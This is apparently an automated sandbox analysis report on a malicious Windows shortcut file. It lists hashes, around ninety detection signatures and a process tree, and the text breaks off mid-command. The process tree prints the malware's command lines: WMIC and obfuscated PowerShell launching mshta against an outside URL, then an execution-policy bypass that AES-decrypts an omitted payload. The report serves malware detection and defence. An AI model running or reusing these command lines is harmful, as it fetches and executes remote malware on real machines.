Windows Analysis Report
7A2lfjTYNf.lnk
Overview
General Information
Sample name: | 7A2lfjTYNf.lnk (renamed because the original name is a hash value) |
Original sample name: | 767810929a7b0dddecaad84a15aed733.lnk |
Analysis ID: | 1579758 |
MD5: | 767810929a7b0dddecaad84a15aed733 |
SHA1: | 529f0a59889968b60a992452e3d3bd876a7a02bc |
SHA256: | 295fae2f581e04308ae737dd0ee934da80099da2d9b3e90d7d907a57265b2a91 |
Tags: | lnk, user-abuse_ch |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- WMIC.exe (PID: 4148 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5412 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325') MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghepduy1325" MD5: 04029E121A0CFA5991749937DD22A1D9)
- mshta.exe (PID: 5172 cmdline: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghepduy1325 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '<hex-encoded payload blob omitted>';function yVE ($UZpVPhOy){return -split ($UZpVPhOy -replace '..', '0x$& ')};$foocSK = yVE($ddg.SubString(0, 2016));$vAM = [System.Security.Cryptography.Aes]::Create();$vAM.Key = yVE($ddg.SubString(2016));$vAM.IV = New-Object byte[] 16;$MnEAtBA = $vAM.CreateDecryptor();$QXykJ = [System.String]::n